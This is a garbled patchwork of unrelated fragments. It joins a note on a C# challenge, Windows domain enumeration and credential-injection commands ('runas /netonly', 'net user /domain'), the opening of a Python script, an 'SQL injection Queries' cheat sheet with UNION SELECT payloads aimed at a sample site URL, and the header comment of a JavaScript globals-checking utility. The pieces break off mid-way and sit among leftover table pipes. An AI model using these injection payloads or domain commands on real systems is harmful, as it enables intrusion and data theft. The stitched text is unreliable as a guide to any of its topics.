The challenge is written in C#. In the beginning of Program.cs we can find the following line:
Encoding.RegisterProvider(CodePagesEncodingProvider.Instance);| # Enumeration | |
| # Credential Injection | |
| runas.exe /netonly /user:<domain>\<username> cmd.exe | |
| # enumeration users | |
| users | |
| net user /domain |
| import requests | |
| import socket | |
| import sys | |
| import random | |
| import string | |
| banner=""" |
| `-=[SQL injection Queries]=- | |
| HOW TO SUCCESSFULLY INJECTING SQL INJECTION | |
| [~] after id no. like id=1 +/*!and*/+1=0 [~] | |
| EX: site.com?index.php?pageid=3 div+0 Union select 1,version(),3,4,5 | |
| +div+0 | |
| +div false | |
| +Having+1=0+ |
| /** | |
| * RuntimeGlobalsChecker | |
| * | |
| * You can use this utility to quickly check what variables have been added (or | |
| * leaked) to the global window object at runtime (by JavaScript code). | |
| * By running this code, the globals checker itself is attached as a singleton | |
| * to the window object as "__runtimeGlobalsChecker__". | |
| * You can check the runtime globals programmatically at any time by invoking | |
| * "window.__runtimeGlobalsChecker__.getRuntimeGlobals()". | |
| * |